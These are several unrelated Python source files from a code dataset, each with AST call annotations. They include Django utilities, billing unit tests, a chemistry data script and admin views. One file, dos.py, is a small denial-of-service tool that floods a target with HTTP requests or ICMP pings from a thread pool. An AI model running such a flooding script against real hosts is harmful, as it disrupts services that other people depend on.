| [((16, 16, 16, 54), 're.sub', 're.sub', ({(16, 23, 16, 42): '"""(?<=[\\\\(\\\\[])\\\\n\\\\s+"""', (16, 44, 16, 46): '""""""', (16, 48, 16, 53): 'dump1'}, {}), "('(?<=[\\\\(\\\\[])\\\\n\\\\s+', '', dump1)", False, 'import re\n'), ((17, 16, 17, 44), 're.sub', 're.sub', ({(17, 23, 17, 31): '"""\\\\n\\\\s+"""', (17, 33, 17, 36): '""" """', (17, 38, 17, 43): 'dump1'}, {}), "('\\\\n\\\\s+', ' ', dump1)", False, 'import re\n'), ((22, 16, 22, 37), 'astunparse.dump', 'astunparse.dump', ({(22, 32, 22, 36): 'ast_'}, {}), '(ast_)', False, 'import astunparse\n'), ((23, 16, 23, 30), 'ast.dump', 'ast.dump', ({(23, 25, 23, 29): 'ast_'}, {}), '(ast_)', False, 'import ast\n')] |
addgene/giraffe | src/django/giraffe/blat/management/commands/reset_app.py | c7d3b1f000ceea83e6c98cce06cd2a0f9e4f4c2c | from django.core.management.base import AppCommand, CommandError
from django.core.management.sql import sql_reset
from django.core.management.color import no_style
from django.db import connections
class Command(AppCommand):
help = "**********\nThis command resets data for any django app, the difference with the built-in command\n\n '$ python manage.py reset <app_name>'\n\nis that when a sql statement fails, it jumps to the next statement generated by command\n\n '$ python manage.py sqlreset <app_name>'\n\nUseful when the original reset fail when droping CONSTRAINTS\n**********"
output_transaction = True
def handle_app(self, app, **options):
connection = connections['default']
self.style = no_style()
custom_reset_statements = sql_reset(app, self.style, connection)
cursor = connection.cursor()
def execute_sqlreset():
failed_statements = []
for sql in custom_reset_statements:
print 'statement>>>> ' + sql
try:
cursor.execute(sql)
except Exception,e:
if e[0] == 1025:
failed_statements.append(sql)
if failed_statements:
print "These statements failed: "
for s in failed_statements:
print s
execute_sqlreset()
| [] |
JordanBRoberts/python-theBand | webBlog/apps.py | 1e475a45a42b210c722ab43c0b966d7b58d97a9d | from django.apps import AppConfig
class WebblogConfig(AppConfig):
name = 'webBlog'
| [] |
lydaaa/fzutils | requires.py | 5f775d046876e3ce35d0b1174b5a3db96e9d627e | # coding:utf-8
'''
@author = super_fazai
@File : requires.py
@Time : 2016/8/3 12:59
@connect : [email protected]
'''
install_requires = [
'ipython',
'wheel',
'utils',
'db',
'greenlet==0.4.13',
'web.py==0.40.dev1',
'pytz',
'requests',
'selenium==3.8.0', # 3.8.1及其以上版本不支持phantomjs了
'asyncio',
'psutil',
'pyexecjs',
'setuptools',
'colorama',
'twine',
'numpy',
'pprint',
'selenium',
'chardet',
'bs4',
'scrapy',
'demjson',
'pymssql',
'sqlalchemy',
'gevent',
'aiohttp',
'celery',
'jsonpath',
'matplotlib',
'wget',
'flask',
'flask_login',
'mitmproxy', # shell 抓包代理
'pymongo',
'pyexcel',
'pyexcel-xlsx',
'fabric',
'shadowsocks',
# 'pycurl==7.43.0.1',
'furl',
'yarl',
'prettytable',
'xlrd',
'pandas',
'jieba',
'geopandas',
'scikit-image',
'wordcloud', # 词云
'pygame',
] | [] |
venkatarjun/Python3 | m15_dos/dos.py | 606adf8588a74a53d592e62e07e81a5a1530b993 | import subprocess
import requests
import argparse
from concurrent.futures import ThreadPoolExecutor
from time import sleep
from datetime import datetime
ICMP_ATTACK = "ICMP"
HTTP_ATTACK = "HTTP"
valid_attacks = {HTTP_ATTACK, ICMP_ATTACK}
parser = argparse.ArgumentParser(description="DoS HTTP")
parser.add_argument('-P', '--poolsize', default=10, help='Size of the threadpool')
parser.add_argument('-T', '--target', default='localhost', help='Target URL for http request')
parser.add_argument('-D', '--delay', default=0, help='Amount of time to wait between requests')
parser.add_argument('-A', '--attack', help='Type of attack (e.g. HTTP, ICMP)')
args = parser.parse_args()
threadpool_size = int(args.poolsize)
target = args.target
delay = int(args.delay)
attack = args.attack.upper()
if attack not in valid_attacks:
print(f"Invalid attack type, must be one of: {valid_attacks}")
exit()
terminate = False
def http_request(url):
global terminate
while True and not terminate:
response = requests.get(url)
if not response.ok:
print(f"{str(datetime.now())[:-3]} !!! HTTP request failed, code: {response.status_code}")
else:
print(f"{str(datetime.now())[:-3]} ---> HTTP request successful")
if delay > 0:
for _ in range(0, delay): sleep(1)
print("...http_request thread terminated")
def ping_host(ip):
global terminate
while True and not terminate:
try:
subprocess.check_output(["ping", "-c3", "-n", "-i0.5", "-W2", ip])
print(f"{str(datetime.now())[:-3]} ---> Ping successful: {ip}")
except subprocess.CalledProcessError:
print(f"{str(datetime.now())[:-3]} !!! Ping failed: {ip}")
if delay > 0:
for _ in range(0, delay): sleep(1)
def main():
global terminate
try:
targets = [target for _ in range(0, threadpool_size)]
with ThreadPoolExecutor(max_workers=threadpool_size) as executor:
if attack == HTTP_ATTACK:
executor.map(http_request, targets)
elif attack == ICMP_ATTACK:
executor.map(ping_host, targets)
else:
return # should not have gotten here
except KeyboardInterrupt:
print("... terminating application ...", end="")
terminate = True
print("terminated")
if __name__ == "__main__":
main()
| [((12, 9, 12, 56), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((38, 19, 38, 36), 'requests.get', 'requests.get', ({(38, 32, 38, 35): 'url'}, {}), '(url)', False, 'import requests\n'), ((57, 12, 57, 78), 'subprocess.check_output', 'subprocess.check_output', ({(57, 36, 57, 77): "['ping', '-c3', '-n', '-i0.5', '-W2', ip]"}, {}), "(['ping', '-c3', '-n', '-i0.5', '-W2', ip])", False, 'import subprocess\n'), ((73, 13, 73, 60), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', (), '', False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((45, 38, 45, 46), 'time.sleep', 'sleep', ({(45, 44, 45, 45): '(1)'}, {}), '(1)', False, 'from time import sleep\n'), ((64, 38, 64, 46), 'time.sleep', 'sleep', ({(64, 44, 64, 45): '(1)'}, {}), '(1)', False, 'from time import sleep\n'), ((40, 25, 40, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((42, 25, 42, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((58, 25, 58, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((61, 25, 61, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')] |
estudio89/maestro-python | maestro/backends/django/contrib/signals.py | 331079cb3f0c10de2e19210cbade793544510f33 | from django.apps import apps
from django.db import models
from django.db.models.signals import post_save, pre_delete
from typing import Type, Optional, List, cast, TYPE_CHECKING
from maestro.backends.django.settings import maestro_settings
from maestro.backends.django.contrib.factory import create_django_data_store
from maestro.backends.django.utils import model_to_entity_name
from maestro.core.metadata import Operation
from .middleware import _add_operation_to_queue
import copy
if TYPE_CHECKING:
from maestro.backends.django import DjangoDataStore
def model_saved_signal(
sender: "Type[models.Model]",
instance: "models.Model",
created: "bool",
raw: "bool",
using: "str",
update_fields: "Optional[List[str]]",
**kwargs,
):
operation: "Operation"
if created:
operation = Operation.INSERT
else:
operation = Operation.UPDATE
data_store: "DjangoDataStore" = create_django_data_store()
entity_name = model_to_entity_name(instance)
data_store.commit_item_change(
operation=operation,
entity_name=entity_name,
item_id=str(instance.pk),
item=copy.deepcopy(instance),
execute_operation=False,
)
_add_operation_to_queue(operation=operation, item=copy.deepcopy(instance))
def model_pre_delete_signal(
sender: "Type[models.Model]", instance: "models.Model", using: "str", **kwargs
):
data_store: "DjangoDataStore" = create_django_data_store()
entity_name = model_to_entity_name(instance)
data_store.commit_item_change(
operation=Operation.DELETE,
entity_name=entity_name,
item_id=str(instance.pk),
item=copy.deepcopy(instance),
execute_operation=False,
)
_add_operation_to_queue(operation=Operation.DELETE, item=copy.deepcopy(instance))
def _connect_signal(model: "models.Model"):
full_label = (
cast("str", model._meta.app_label) + "_" + cast("str", model._meta.model_name)
)
post_save.connect(
receiver=model_saved_signal,
sender=model,
dispatch_uid=full_label + "_update_sync",
)
pre_delete.connect(
receiver=model_pre_delete_signal,
sender=model,
dispatch_uid=full_label + "_delete_sync",
)
def connect_signals():
for app_model in maestro_settings.MODELS:
model = apps.get_model(app_model)
_connect_signal(model=model)
def _disconnect_signal(model: "models.Model"):
full_label = (
cast("str", model._meta.app_label) + "_" + cast("str", model._meta.model_name)
)
post_save.disconnect(
receiver=model_saved_signal,
sender=model,
dispatch_uid=full_label + "_update_sync",
)
pre_delete.disconnect(
receiver=model_pre_delete_signal,
sender=model,
dispatch_uid=full_label + "_delete_sync",
)
class _DisableSignalsContext:
def __init__(self, model: "Type[models.Model]"):
self.model = model
def __enter__(self):
_disconnect_signal(model=self.model)
def __exit__(self, type, value, traceback):
label = self.model._meta.app_label + "." + self.model._meta.model_name
enabled_models = [label.lower() for label in maestro_settings.MODELS]
if label in enabled_models:
_connect_signal(model=self.model)
def temporarily_disable_signals(model: "Type[models.Model]"):
return _DisableSignalsContext(model=model)
| [((31, 36, 31, 62), 'maestro.backends.django.contrib.factory.create_django_data_store', 'create_django_data_store', ({}, {}), '()', False, 'from maestro.backends.django.contrib.factory import create_django_data_store\n'), ((32, 18, 32, 48), 'maestro.backends.django.utils.model_to_entity_name', 'model_to_entity_name', ({(32, 39, 32, 47): 'instance'}, {}), '(instance)', False, 'from maestro.backends.django.utils import model_to_entity_name\n'), ((47, 36, 47, 62), 'maestro.backends.django.contrib.factory.create_django_data_store', 'create_django_data_store', ({}, {}), '()', False, 'from maestro.backends.django.contrib.factory import create_django_data_store\n'), ((48, 18, 48, 48), 'maestro.backends.django.utils.model_to_entity_name', 'model_to_entity_name', ({(48, 39, 48, 47): 'instance'}, {}), '(instance)', False, 'from maestro.backends.django.utils import model_to_entity_name\n'), ((63, 4, 67, 5), 'django.db.models.signals.post_save.connect', 'post_save.connect', (), '', False, 'from django.db.models.signals import post_save, pre_delete\n'), ((69, 4, 73, 5), 'django.db.models.signals.pre_delete.connect', 'pre_delete.connect', (), '', False, 'from django.db.models.signals import post_save, pre_delete\n'), ((86, 4, 90, 5), 'django.db.models.signals.post_save.disconnect', 'post_save.disconnect', (), '', False, 'from django.db.models.signals import post_save, pre_delete\n'), ((91, 4, 95, 5), 'django.db.models.signals.pre_delete.disconnect', 'pre_delete.disconnect', (), '', False, 'from django.db.models.signals import post_save, pre_delete\n'), ((61, 51, 61, 86), 'typing.cast', 'cast', ({(61, 56, 61, 61): '"""str"""', (61, 63, 61, 85): 'model._meta.model_name'}, {}), "('str', model._meta.model_name)", False, 'from typing import Type, Optional, List, cast, TYPE_CHECKING\n'), ((78, 16, 78, 41), 'django.apps.apps.get_model', 'apps.get_model', ({(78, 31, 78, 40): 'app_model'}, {}), '(app_model)', False, 'from django.apps import apps\n'), ((84, 51, 84, 86), 'typing.cast', 'cast', ({(84, 56, 84, 61): '"""str"""', (84, 63, 84, 85): 'model._meta.model_name'}, {}), "('str', model._meta.model_name)", False, 'from typing import Type, Optional, List, cast, TYPE_CHECKING\n'), ((37, 13, 37, 36), 'copy.deepcopy', 'copy.deepcopy', ({(37, 27, 37, 35): 'instance'}, {}), '(instance)', False, 'import copy\n'), ((40, 54, 40, 77), 'copy.deepcopy', 'copy.deepcopy', ({(40, 68, 40, 76): 'instance'}, {}), '(instance)', False, 'import copy\n'), ((53, 13, 53, 36), 'copy.deepcopy', 'copy.deepcopy', ({(53, 27, 53, 35): 'instance'}, {}), '(instance)', False, 'import copy\n'), ((56, 61, 56, 84), 'copy.deepcopy', 'copy.deepcopy', ({(56, 75, 56, 83): 'instance'}, {}), '(instance)', False, 'import copy\n'), ((61, 8, 61, 42), 'typing.cast', 'cast', ({(61, 13, 61, 18): '"""str"""', (61, 20, 61, 41): 'model._meta.app_label'}, {}), "('str', model._meta.app_label)", False, 'from typing import Type, Optional, List, cast, TYPE_CHECKING\n'), ((84, 8, 84, 42), 'typing.cast', 'cast', ({(84, 13, 84, 18): '"""str"""', (84, 20, 84, 41): 'model._meta.app_label'}, {}), "('str', model._meta.app_label)", False, 'from typing import Type, Optional, List, cast, TYPE_CHECKING\n')] |
pbexe/nextbike-top | top/urls.py | eca086406cf6b96d6e086dd0fa9ecae5b6364f4d | from django.urls import include, path
from .views import home, bike
urlpatterns = [
path("", home),
path("bike/<int:number>", bike)
] | [((5, 4, 5, 18), 'django.urls.path', 'path', ({(5, 9, 5, 11): '""""""', (5, 13, 5, 17): 'home'}, {}), "('', home)", False, 'from django.urls import include, path\n'), ((6, 4, 6, 35), 'django.urls.path', 'path', ({(6, 9, 6, 28): '"""bike/<int:number>"""', (6, 30, 6, 34): 'bike'}, {}), "('bike/<int:number>', bike)", False, 'from django.urls import include, path\n')] |
mike72353/FragFeatureNet | Scripts/ReduceFragments.py | ef61ae52e3d6dcc6d2d56df2a6bd5fe1a298c930 | """
Remove Fragments not in Knowledgebase
"""
__author__ = "Michael Suarez"
__email__ = "[email protected]"
__copyright__ = "Copyright 2019, Hong Kong University of Science and Technology"
__license__ = "3-clause BSD"
from argparse import ArgumentParser
import numpy as np
import pickle
parser = ArgumentParser(description="Build Files")
parser.add_argument("--datadir", type=str, default="Data", help="input - XXX.YYY ")
parser.add_argument("--envNewAcronym", type=str, default="PRT.SNW", help="input - XXX.YYY ")
args = parser.parse_args()
# Check the Bound Fragments
BoundFrags = np.loadtxt("../%s/%s/%s.Homogenised.boundfrags_zeros.txt" %(args.datadir, args.envNewAcronym, args.envNewAcronym), delimiter=',')
normalDF = pickle.load(open("../%s/GrandCID.dict" %(args.datadir), "rb"))
binding = np.full(BoundFrags.shape,-1)
mlength = 0
for r, i in enumerate(BoundFrags):
for c, j in enumerate(i[i!=0]):
try:
# Checks whether the Fragment can be found in the 59k Fragment Base
binding[r,c]=normalDF.index.get_loc(int(j))
except:
continue
temp = binding[r]
if temp[temp!=-1].shape[0] > mlength:
mlength = temp[temp!=-1].shape[0]
print(mlength) #Finds the maximum number of Fragments per environment -> 705
indices = np.empty(binding.shape[0])
red_binding = np.full((binding.shape[0], mlength), -1)
for j, i in enumerate(binding):
indices[j] = i[i!=-1].shape[0]
red_binding[j][:int(indices[j])] = i[i!=-1]
red_binding = np.delete(red_binding, np.where(indices==0), axis=0)
pickle.dump(red_binding, open("../%s/%s/%s.binding.mtr" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "wb"))
# Removes environments without binding Fragments
Features_all = pickle.load(open("../%s/%s/%s.Homogenised.property.pvar" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "rb"))
Features_all = np.delete(Features_all, np.where(indices==0), axis=0)
pickle.dump(Features_all, open("../%s/%s/%s.Homogenised.property.pvar" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "wb"))
# Removes environment annotiation without binding fragments
with open("../%s/%s/%s.Homogenised.annotation.txt" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "r+") as f:
lines = f.readlines()
for i in np.where(indices==0)[0][::-1]:
del lines[i]
f.seek(0)
f.truncate()
f.writelines(lines)
| [((14, 9, 14, 50), 'argparse.ArgumentParser', 'ArgumentParser', (), '', False, 'from argparse import ArgumentParser\n'), ((23, 13, 23, 142), 'numpy.loadtxt', 'np.loadtxt', (), '', True, 'import numpy as np\n'), ((27, 10, 27, 38), 'numpy.full', 'np.full', ({(27, 18, 27, 34): 'BoundFrags.shape', (27, 35, 27, 37): '-1'}, {}), '(BoundFrags.shape, -1)', True, 'import numpy as np\n'), ((41, 10, 41, 36), 'numpy.empty', 'np.empty', ({(41, 19, 41, 35): 'binding.shape[0]'}, {}), '(binding.shape[0])', True, 'import numpy as np\n'), ((42, 14, 42, 54), 'numpy.full', 'np.full', ({(42, 22, 42, 49): '(binding.shape[0], mlength)', (42, 51, 42, 53): '-1'}, {}), '((binding.shape[0], mlength), -1)', True, 'import numpy as np\n'), ((46, 37, 46, 57), 'numpy.where', 'np.where', ({(46, 46, 46, 56): 'indices == 0'}, {}), '(indices == 0)', True, 'import numpy as np\n'), ((52, 39, 52, 59), 'numpy.where', 'np.where', ({(52, 48, 52, 58): 'indices == 0'}, {}), '(indices == 0)', True, 'import numpy as np\n'), ((58, 13, 58, 33), 'numpy.where', 'np.where', ({(58, 22, 58, 32): '(indices == 0)'}, {}), '(indices == 0)', True, 'import numpy as np\n')] |
vbohinc/CommunityCellularManager | client/core/tests/billing_tests.py | ab330fcb1bc70ee3a8e9bcdac2846ab6c327f87c | """Tests for core.billing.
Run this test from the project root
$ nosetests core.tests.billing_tests
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import random
import math
from core.billing import get_call_cost
from core.billing import get_prefix_from_number
from core.billing import get_sms_cost
from core.billing import process_prices
from core.billing import round_to_billable_unit
from core.billing import round_up_to_nearest_100
from core import config_database
TARIFF = 100
class GetCostTest(unittest.TestCase):
"""Testing core.billing.get_call_cost."""
@classmethod
def setUpClass(cls):
# Setup the config db.
cls.config_db = config_database.ConfigDB()
cls.config_db['bts_secret'] = 'hokay'
cls.config_db['free_seconds'] = '5'
cls.config_db['billable_unit'] = '1'
# Setup some price data like what would be sent back from the cloud.
price_data = [
{
'directionality': 'off_network_send',
'prefix': '509',
'country_name': 'Haiti',
'country_code': 'HT',
'cost_to_subscriber_per_sms': 900,
'cost_to_subscriber_per_min': 1100,
'billable_unit': 1,
}, {
'directionality': 'off_network_send',
'prefix': '56',
'country_name': 'Chile',
'country_code': 'CL',
'cost_to_subscriber_per_sms': 1000,
'cost_to_subscriber_per_min': 800,
'billable_unit': 1,
}, {
'directionality': 'off_network_send',
'prefix': '63',
'country_name': 'Philippines',
'country_code': 'PH',
'cost_to_subscriber_per_sms': 100,
'cost_to_subscriber_per_min': 600,
'billable_unit': 30,
}, {
'directionality': 'off_network_receive',
'cost_to_subscriber_per_sms': 200,
'cost_to_subscriber_per_min': 100,
'billable_unit': 1,
}, {
'directionality': 'on_network_send',
'cost_to_subscriber_per_sms': 400,
'cost_to_subscriber_per_min': 300,
'billable_unit': 1,
}, {
'directionality': 'on_network_receive',
'cost_to_subscriber_per_sms': 500,
'cost_to_subscriber_per_min': 200,
'billable_unit': 1,
}
]
# Populate the config db with prices
process_prices(price_data, cls.config_db)
def test_on_receive_call(self):
"""We can get the subscriber price for an on-network received call."""
billable_seconds = 170
# Recall that the expected cost is rounded to the nearest value of 100.
expected_cost = 600
self.assertEqual(expected_cost,
get_call_cost(billable_seconds, 'on_network_receive'))
def test_on_receive_sms(self):
"""We can get the subscriber price for an on-network received SMS."""
expected_cost = 500
self.assertEqual(expected_cost, get_sms_cost('on_network_receive'))
def test_off_receive_call(self):
"""We can get the subscriber price for an off-network received call."""
billable_seconds = 700
expected_cost = 1200
self.assertEqual(
expected_cost,
get_call_cost(billable_seconds, 'off_network_receive'))
def test_off_receive_sms(self):
"""We can get the subscriber price for an off-network received SMS."""
expected_cost = 200
self.assertEqual(expected_cost, get_sms_cost('off_network_receive'))
def test_on_send_call(self):
"""We can get the subscriber price for an on-network sent call."""
billable_seconds = 190
expected_cost = 1000
self.assertEqual(expected_cost,
get_call_cost(billable_seconds, 'on_network_send'))
def test_on_send_sms(self):
"""We can get the subscriber price for an on-network sent SMS."""
expected_cost = 400
self.assertEqual(expected_cost, get_sms_cost('on_network_send'))
def test_call_to_chile(self):
"""We can get the cost of a call to Chile."""
billable_seconds = 830
expected_cost = 11000
number = ''.join(['56', '1235554567'])
actual_cost = get_call_cost(billable_seconds, 'off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_sms_to_chile(self):
"""We can get the price to a subscriber of an SMS sent to Chile."""
expected_cost = 1000
number = ''.join(['56', '1235554567'])
actual_cost = get_sms_cost('off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_call_to_ph(self):
""" We bill for calls to PH correctly. """
billable_seconds = 70
expected_cost = 900
number = ''.join(['63', '5551234567'])
actual_cost = get_call_cost(billable_seconds, 'off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_nonexistent_prefix(self):
"""If the prefix doesn't exist, it's free.
The prefix price key might not exist if, say, the billing tier data
has not yet been loaded.
"""
expected_cost = 0
number = ''.join(['9999', '1235554567'])
actual_cost = get_sms_cost('off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
class GetPrefixFromNumberTest(unittest.TestCase):
"""Testing core.billing.get_prefix_from_number."""
@classmethod
def setUpClass(cls):
# Setup the config db.
cls.config_db = config_database.ConfigDB()
cls.config_db['bts_secret'] = 'yup'
# Load up some pricing data into the config db. We use this data to
# determine what prefixes are available.
# 2015dec9(shasan): This is a legacy billing response, lacking billable
# units. This also tests we can handle that case.
price_data = [
{
'directionality': 'off_network_send',
'prefix': '789',
'country_name': 'Ocenaia',
'country_code': 'OC',
'cost_to_subscriber_per_sms': 300,
'cost_to_subscriber_per_min': 20,
}, {
'directionality': 'off_network_send',
'prefix': '78',
'country_name': 'Eurasia',
'country_code': 'EU',
'cost_to_subscriber_per_sms': 400,
'cost_to_subscriber_per_min': 10,
}, {
'directionality': 'off_network_send',
'prefix': '7',
'country_name': 'Eastasia',
'country_code': 'EA',
'cost_to_subscriber_per_sms': 500,
'cost_to_subscriber_per_min': 30,
}, {
'directionality': 'off_network_send',
'prefix': '3',
'country_name': 'London',
'country_code': 'LN',
'cost_to_subscriber_per_sms': 5000,
'cost_to_subscriber_per_min': 3000,
}
]
# Populate the config db with prices
process_prices(price_data, cls.config_db)
def test_get_one_digit_prefix(self):
"""We can get a one digit prefix."""
number = ''.join(['7', '1235557890'])
self.assertEqual('7', get_prefix_from_number(number))
def test_get_two_digit_prefix(self):
"""We can get a two digit prefix."""
number = ''.join(['78', '1235557890'])
self.assertEqual('78', get_prefix_from_number(number))
def test_get_three_digit_prefix(self):
"""We can get a three digit prefix."""
number = ''.join(['789', '1235557890'])
self.assertEqual('789', get_prefix_from_number(number))
def test_get_one_digit_uncommon_prefix(self):
"""We can get a one digit uncommon prefix."""
number = ''.join(['3', '1235557890'])
self.assertEqual('3', get_prefix_from_number(number))
class RoundCostToBillableUnit(unittest.TestCase):
"""Testing core.billing.round_to_billable_unit."""
def test_billable_unit_rounding_sans_free_seconds(self):
for i in range(100):
billsec = random.randint(1, 5000)
expected_cost = int(billsec * (TARIFF / 60.0))
print('%s seconds should cost %s' % (billsec, expected_cost))
self.assertEqual(expected_cost,
round_to_billable_unit(billsec, TARIFF))
def test_billable_unit_rounding_with_free_seconds(self):
for i in range(100):
billsec = random.randint(100, 5000)
free = random.randint(1, 100)
expected_cost = int((billsec - free) * (TARIFF / 60.0))
print('%s seconds with %s free should cost %s' %
(billsec, free, expected_cost))
self.assertEqual(expected_cost,
round_to_billable_unit(billsec, TARIFF, free))
def test_billable_unit_rounding_with_units(self):
"""Test the "rows" of this table: (billsec, expected_cost)."""
tests = [
# base case
(0, 60, 0, 30, 0),
# call too short
(5, 60, 0, 30, 30),
# changing the units
(5, 60, 0, 60, 60),
# call slightly too long
(61, 60, 0, 60, 120),
# weird non-uniform per minute
(61, 72, 0, 30, 108),
# including free seconds
(61, 60, 10, 60, 60)
]
for test in tests:
billsec = test[0]
rate = test[1]
free = test[2]
unit = test[3]
expected_cost = test[4]
actual_cost = round_to_billable_unit(billsec, rate, free, unit)
print('%s sec with %s free and a unit of %s sec '
'expected cost %s, actual cost %s' %
(billsec, free, unit, expected_cost, actual_cost))
self.assertEqual(expected_cost, actual_cost)
class RoundCostUpToNearest100(unittest.TestCase):
"""Testing core.billing.round_up_to_nearest_100."""
def test_round_negatives(self):
# test negatives
for i in [-10000, -100, -1]:
self.assertEqual(0, round_up_to_nearest_100(i))
def test_round_positives(self):
for i in range(0, 5000):
self.assertEqual(int(math.ceil(i / float(100))) * 100,
round_up_to_nearest_100(i))
| [((40, 24, 40, 50), 'core.config_database.ConfigDB', 'config_database.ConfigDB', ({}, {}), '()', False, 'from core import config_database\n'), ((88, 8, 88, 49), 'core.billing.process_prices', 'process_prices', ({(88, 23, 88, 33): 'price_data', (88, 35, 88, 48): 'cls.config_db'}, {}), '(price_data, cls.config_db)', False, 'from core.billing import process_prices\n'), ((133, 22, 134, 62), 'core.billing.get_call_cost', 'get_call_cost', (), '', False, 'from core.billing import get_call_cost\n'), ((141, 22, 142, 61), 'core.billing.get_sms_cost', 'get_sms_cost', (), '', False, 'from core.billing import get_sms_cost\n'), ((150, 22, 151, 62), 'core.billing.get_call_cost', 'get_call_cost', (), '', False, 'from core.billing import get_call_cost\n'), ((162, 22, 163, 61), 'core.billing.get_sms_cost', 'get_sms_cost', (), '', False, 'from core.billing import get_sms_cost\n'), ((172, 24, 172, 50), 'core.config_database.ConfigDB', 'config_database.ConfigDB', ({}, {}), '()', False, 'from core import config_database\n'), ((210, 8, 210, 49), 'core.billing.process_prices', 'process_prices', ({(210, 23, 210, 33): 'price_data', (210, 35, 210, 48): 'cls.config_db'}, {}), '(price_data, cls.config_db)', False, 'from core.billing import process_prices\n'), ((96, 25, 96, 78), 'core.billing.get_call_cost', 'get_call_cost', ({(96, 39, 96, 55): 'billable_seconds', (96, 57, 96, 77): '"""on_network_receive"""'}, {}), "(billable_seconds, 'on_network_receive')", False, 'from core.billing import get_call_cost\n'), ((101, 40, 101, 74), 'core.billing.get_sms_cost', 'get_sms_cost', ({(101, 53, 101, 73): '"""on_network_receive"""'}, {}), "('on_network_receive')", False, 'from core.billing import get_sms_cost\n'), ((109, 12, 109, 66), 'core.billing.get_call_cost', 'get_call_cost', ({(109, 26, 109, 42): 'billable_seconds', (109, 44, 109, 65): '"""off_network_receive"""'}, {}), "(billable_seconds, 'off_network_receive')", False, 'from core.billing import get_call_cost\n'), ((114, 40, 114, 75), 'core.billing.get_sms_cost', 'get_sms_cost', ({(114, 53, 114, 74): '"""off_network_receive"""'}, {}), "('off_network_receive')", False, 'from core.billing import get_sms_cost\n'), ((121, 25, 121, 75), 'core.billing.get_call_cost', 'get_call_cost', ({(121, 39, 121, 55): 'billable_seconds', (121, 57, 121, 74): '"""on_network_send"""'}, {}), "(billable_seconds, 'on_network_send')", False, 'from core.billing import get_call_cost\n'), ((126, 40, 126, 71), 'core.billing.get_sms_cost', 'get_sms_cost', ({(126, 53, 126, 70): '"""on_network_send"""'}, {}), "('on_network_send')", False, 'from core.billing import get_sms_cost\n'), ((215, 30, 215, 60), 'core.billing.get_prefix_from_number', 'get_prefix_from_number', ({(215, 53, 215, 59): 'number'}, {}), '(number)', False, 'from core.billing import get_prefix_from_number\n'), ((220, 31, 220, 61), 'core.billing.get_prefix_from_number', 'get_prefix_from_number', ({(220, 54, 220, 60): 'number'}, {}), '(number)', False, 'from core.billing import get_prefix_from_number\n'), ((225, 32, 225, 62), 'core.billing.get_prefix_from_number', 'get_prefix_from_number', ({(225, 55, 225, 61): 'number'}, {}), '(number)', False, 'from core.billing import get_prefix_from_number\n'), ((230, 30, 230, 60), 'core.billing.get_prefix_from_number', 'get_prefix_from_number', ({(230, 53, 230, 59): 'number'}, {}), '(number)', False, 'from core.billing import get_prefix_from_number\n'), ((238, 22, 238, 45), 'random.randint', 'random.randint', ({(238, 37, 238, 38): '1', (238, 40, 238, 44): '5000'}, {}), '(1, 5000)', False, 'import random\n'), ((246, 22, 246, 47), 'random.randint', 'random.randint', ({(246, 37, 246, 40): '100', (246, 42, 246, 46): '5000'}, {}), '(100, 5000)', False, 'import random\n'), ((247, 19, 247, 41), 'random.randint', 'random.randint', ({(247, 34, 247, 35): '1', (247, 37, 247, 40): '100'}, {}), '(1, 100)', False, 'import random\n'), ((276, 26, 276, 75), 'core.billing.round_to_billable_unit', 'round_to_billable_unit', ({(276, 49, 276, 56): 'billsec', (276, 58, 276, 62): 'rate', (276, 64, 276, 68): 'free', (276, 70, 276, 74): 'unit'}, {}), '(billsec, rate, free, unit)', False, 'from core.billing import round_to_billable_unit\n'), ((242, 29, 242, 68), 'core.billing.round_to_billable_unit', 'round_to_billable_unit', ({(242, 52, 242, 59): 'billsec', (242, 61, 242, 67): 'TARIFF'}, {}), '(billsec, TARIFF)', False, 'from core.billing import round_to_billable_unit\n'), ((252, 29, 252, 74), 'core.billing.round_to_billable_unit', 'round_to_billable_unit', ({(252, 52, 252, 59): 'billsec', (252, 61, 252, 67): 'TARIFF', (252, 69, 252, 73): 'free'}, {}), '(billsec, TARIFF, free)', False, 'from core.billing import round_to_billable_unit\n'), ((289, 32, 289, 58), 'core.billing.round_up_to_nearest_100', 'round_up_to_nearest_100', ({(289, 56, 289, 57): 'i'}, {}), '(i)', False, 'from core.billing import round_up_to_nearest_100\n'), ((294, 29, 294, 55), 'core.billing.round_up_to_nearest_100', 'round_up_to_nearest_100', ({(294, 53, 294, 54): 'i'}, {}), '(i)', False, 'from core.billing import round_up_to_nearest_100\n')] |
s-i-l-k-e/django-data-interrogator | data_interrogator/admin/views.py | 0284168b81aaa31a8df84f3ea52166eded8a4362 | from django.contrib.auth.decorators import user_passes_test
from django.utils.decorators import method_decorator
from data_interrogator.admin.forms import AdminInvestigationForm, AdminPivotTableForm
from data_interrogator.interrogators import Allowable
from data_interrogator.views import InterrogationView, InterrogationAutocompleteUrls, PivotTableView, \
InterrogationAutoComplete
class AdminInterrogationRoom(InterrogationView):
template_name = 'admin/analytics/analytics.html'
form_class = AdminInvestigationForm
report_models = Allowable.ALL_MODELS
allowed = Allowable.ALL_APPS
excluded = []
@method_decorator(user_passes_test(lambda u: u.is_superuser))
def get(self, request):
return super(AdminInterrogationRoom,self).get(request)
class AdminInterrogationAutocompleteUrls(InterrogationAutocompleteUrls):
interrogator_view_class = AdminInterrogationRoom
